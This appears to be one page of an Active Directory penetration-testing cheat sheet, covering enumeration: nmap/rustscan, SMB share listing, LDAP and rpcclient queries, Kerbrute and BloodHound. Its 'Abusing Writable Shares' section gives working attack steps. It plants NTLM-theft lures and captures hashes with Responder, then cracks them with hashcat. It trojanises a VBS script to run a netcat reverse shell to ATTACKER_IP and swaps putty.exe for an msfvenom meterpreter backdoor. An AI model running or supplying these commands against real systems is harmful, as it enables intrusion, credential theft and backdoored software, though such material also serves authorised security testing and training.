02 / Enumeration

Enumeration

Map the AD environment: ports, services, SMB shares, LDAP objects, users, groups and BloodHound attack paths. This is where you build the picture needed for everything that follows.

Port Scanning an AD Environment

Key AD ports and what each service exposes. Understanding what rustscan + nmap output tells you about the domain.

NmapRustscanPorts

soon

SMB Enumeration & Writable Shares

Using nxc, smbclient and smbmap to find shares, read SYSVOL and abuse writable shares with ntlm_theft and Responder.

SMBNTLMResponder

soon

LDAP Enumeration & BloodHound

Querying AD via LDAP to enumerate users, groups, SPNs and ACLs. Running BloodHound to visualise attack paths.

LDAPBloodHoundACL

soon

1.1 Port Scanning

rustscan / nmap

Rustscan → nmap (recommended)

ports=$(rustscan -a $TARGET_IP -r 1-65535 --ulimit 5000 -- -Pn -n \
  | awk '/^Open / {split($2,a,":"); print a[2]}' \
  | paste -sd "," -)
nmap -Pn -p $ports -sV -sC --script vuln -v $TARGET_IP -oN nmap_full.txt

Nmap alternatives

nmap -T4 -A -p- $TARGET_IP -oN nmap_full.txt
nmap -sV -sC -p 53,88,135,139,389,445,464,636,3268,3269,5985,9389 $TARGET_IP

Key AD ports reference

Port	Service	Attack Opportunities
53	DNS	Zone transfer, SRV records, Domain mapping
80/443	HTTP/HTTPS	Web exploits, credential forms, NTLM auth
88	Kerberos	AS-REP roasting, Kerberoasting, spraying, Delegation, Golden/Silver ticket
123	NTP	Clock skew fix for Kerberos
135	MSRPC	WMIEXEC, remote service creation
137–139	NetBIOS	LLMNR poisoning, NBT-NS poisoning
389	LDAP	Anonymous bind, User/SPN enum, Group mapping, ACL misconfigs
445	SMB	SYSVOL, GPP passwords, NTLM relay, Share enumeration
464	Kerberos (pw change)	AS-REP roasting, Kerberoasting, Password spraying
636/3268/3269	LDAPS / Global Catalog	Anonymous bind, User/SPN enum, ACL misconfigs
5985/5986	WinRM	Evil-WinRM remote shell
9389	AD Web Services	—
47001	WinRM (alt)	Evil-WinRM

2. SMB Enumeration

nxc / smbclient / smbmap

NXC

Unauthenticated — identify host

nxc smb $TARGET_IP/24
nxc smb $TARGET_IP/24 -u '' -p '' --shares
nxc smb $TARGET_IP/24 -u 'guest' -p '' --shares

Authenticated — shares + spider

nxc smb $TARGET_IP/24 -u $USERNAME -p $PASSWORD --shares
nxc smb $TARGET_IP -u $USERNAME -p $PASSWORD --spider_plus   # index all shares recursively

SMBCLIENT

List shares

smbclient -L //10.10.10.10 -N                          # anonymous
smbclient -L //10.10.10.10 -U 'DOMAIN\username%password'

Browse / download a share

smbclient //10.10.10.10/backup -N
smbclient //10.10.10.10/backup -U 'DOMAIN\username%password'
# inside smb prompt:
prompt off      # no confirmation when downloading
recurse on      # download all files recursively
mget *

Upload a file to a share

smbclient -c 'put myservice.exe' -U ZA '//DOMAIN/admin$/' password

NMAP SMB SCRIPTS

nmap --script smb-enum-shares.nse -p445 $TARGET_IP
nmap --script smb-brute -p 445 $TARGET_IP
nmap -sU -sS --script smb-enum-shares.nse -p U:137,T:139 $TARGET_IP
nmap --script smb-vuln* -p445 $TARGET_IP     # CVE checks (EternalBlue, MS17-010, ...)

SMBMAP

smbmap -H $TARGET_IP                                # anonymous
smbmap -H $TARGET_IP -u $USERNAME -p $PASSWORD      # with credentials
smbmap -H $TARGET_IP -u $USERNAME -p $PASSWORD -R   # recursive
smbmap -H $TARGET_IP -u $USERNAME -p $PASSWORD --download 'share\file.txt'

2.1 Abusing Writable Shares

NTLM capture

Example 1 — ntlm_theft.py

Create all payload types

python3 ~/Tools/ntlm_theft/ntlm_theft.py -g all -s $ATTACKER_IP -f test

Upload to writable share

smbclient //$TARGET_IP/data -U ''
put test/test-(icon).url

Start Responder and catch the NTLMv2 hash

sudo responder -I tun0 -wd
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

Example 2 — NXC Slinky

Start Responder first (check Responder.conf for SMB=On)

sudo nano /usr/share/responder/Responder.conf
sudo responder -I eth0 -wd

Create LNK file on share via nxc

nxc smb 192.168.57.198 -d marvel.local -u fcastle -p Password1 \
  -M slinky -o NAME=@important SERVER=192.168.57.70 SHARES=C$ IGNORE=IPC$

Crack captured hash

hashcat -m 5600 hashes/captured.txt /usr/share/wordlists/rockyou.txt

Example 3 — Trojanise existing VBS script

smbclient //$TARGET_IP/share
get script.vbs
put nc64.exe
# edit script.vbs → add:
# CreateObject("WScript.Shell").Run "cmd.exe /c copy /Y \\ATTACKER_IP\share\nc64.exe %tmp% & %tmp%\nc64.exe -e cmd.exe ATTACKER_IP 1234", 0, True
put script.vbs
nc -lvnp 1234

Example 4 — Replace existing EXE with malicious payload

# Use the same filename as the original
msfvenom -a x64 --platform windows -x putty.exe -k \
  -p windows/meterpreter/reverse_tcp lhost=$ATTACKER_IP lport=4444 \
  -b "\x00" -f exe -o putty.exe
smbclient //$TARGET_IP/share
put putty.exe

3. User & Group Enumeration

nxc / ldap / kerbrute

ENUM4LINUX

enum4linux -a $TARGET_IP    # full scan
enum4linux -U -S $TARGET_IP # fast: users + shares

With credentials

enum4linux -a $TARGET_IP -u username -p password    # full
enum4linux -U -S -u username -p password $TARGET_IP # fast

NXC — USERS & GROUPS

Without credentials — RID brute force

nxc smb $TARGET_IP -u '' -p '' --rid > users.txt
nxc smb $TARGET_IP -u 'guest' -p '' --rid > users.txt
nxc smb $TARGET_IP -u '' -p '' --rid --no-brute > users.txt

Convert RID output to clean usernames list

grep 'SidTypeUser' users.txt | awk -F'\\\\' '{print $2}' | awk '{print $1}' | grep -v '\$' > usernames.txt

With credentials

nxc smb $TARGET_IP -u $USERNAME -p $PASSWORD --users
nxc smb $TARGET_IP -u $USERNAME -p $PASSWORD --users-export users.txt
nxc smb $TARGET_IP -u $USERNAME -p $PASSWORD --loggedon-users
nxc smb $TARGET_IP -u $USERNAME -p $PASSWORD --groups

LDAP — users and groups

nxc ldap $TARGET_IP -u $USERNAME -p $PASSWORD --users
nxc ldap $TARGET_IP -u $USERNAME -p $PASSWORD --active-users
nxc ldap $TARGET_IP -u $USERNAME -p $PASSWORD --groups
nxc ldap $TARGET_IP -u $USERNAME -p $PASSWORD --groups 'Domain Admins'
nxc ldap $TARGET_IP -u $USERNAME -p $PASSWORD --password-not-required   # accounts without password

LDAP — without credentials

nxc ldap $TARGET_IP -u '' -p '' --users
nxc ldap $TARGET_IP -u '' -p '' --query "(description=*)" "sAMAccountName description"

Pass-the-Hash auth

nxc smb $TARGET_IP -u $USERNAME -H 'NTLMHASH' --users
nxc smb $TARGET_IP -u $USERNAME -H 'NTLMHASH' --local-auth

USERNAME GENERATION

Generate AD-style usernames from names

python3 username_generator.py -w users.txt > ad_users.txt

LDAPDOMAINDUMP

ldapdomaindump ldap://$DC_IP$ -o /tmp/dump                           # anonymous
ldapdomaindump ldaps://$DC_IP$ -u '$DOMAIN\username' -p 'password' -o /tmp/dump

LDAPSEARCH

Anonymous — base dump

ldapsearch -x -H ldap://$TARGET_IP \
  -b "DC=$(echo $DOMAIN | sed 's/\./,DC=/g')" > ldap_dump.txt

With credentials

ldapsearch -x -H ldap://$TARGET_IP \
  -D "$USERNAME@$DOMAIN" -w "$PASSWORD" \
  -b "DC=$(echo $DOMAIN | sed 's/\./,DC=/g')" > ldap_dump.txt

Specific user — group membership

ldapsearch -x -H ldap://$TARGET_IP -D "$USERNAME@$DOMAIN" -w "$PASSWORD" \
  -b "DC=$(echo $DOMAIN | sed 's/\./,DC=/g')" "(sAMAccountName=$USERNAME)" memberOf

Accounts with empty passwords

ldapsearch -x -H ldap://$TARGET_IP -D "$USERNAME@$DOMAIN" -w "$PASSWORD" \
  -b "DC=$(echo $DOMAIN | sed 's/\./,DC=/g')" "(&(objectClass=user)(userPassword=*))"

Service accounts (have SPN)

ldapsearch -x -H ldap://$TARGET_IP -D "$USERNAME@$DOMAIN" -w "$PASSWORD" \
  -b "DC=$(echo $DOMAIN | sed 's/\./,DC=/g')" \
  "(&(objectClass=user)(servicePrincipalName=*))" sAMAccountName servicePrincipalName

RPCCLIENT

rpcclient -U '' -N $TARGET_IP
rpcclient -U "$USERNAME%$PASSWORD" $TARGET_IP

Useful rpcclient commands

enumdomusers            # all users
enumdomgroups           # all groups
querygroup 0x200        # info on group (RID in hex)
queryuser 0x1f4         # info on user (500 = Administrator)
enumdomains             # list domains
querydominfo            # domain info
getdompwinfo            # password policy
lsaenumsid              # all SIDs
lookupnames admin        # SID of a user

KERBRUTE — User Validation

kerbrute userenum --dc $TARGET_IP -d $DOMAIN usernames.txt -o valid_users.txt
kerbrute userenum --dc $TARGET_IP -d $DOMAIN /usr/share/seclists/Usernames/Names/names.txt

4. BloodHound

bloodhound-python

Collect all data

bloodhound-python -d $DOMAIN -ns $TARGET_IP -u $USERNAME -p $PASSWORD -c ALL --zip

In BloodHound — search for dangerous permissions

# Look for: GenericAll, ForceChangePassword, AllowedToDelegate, ESC1, Unconstrained

← Reconnaissance Next: Password Attacks →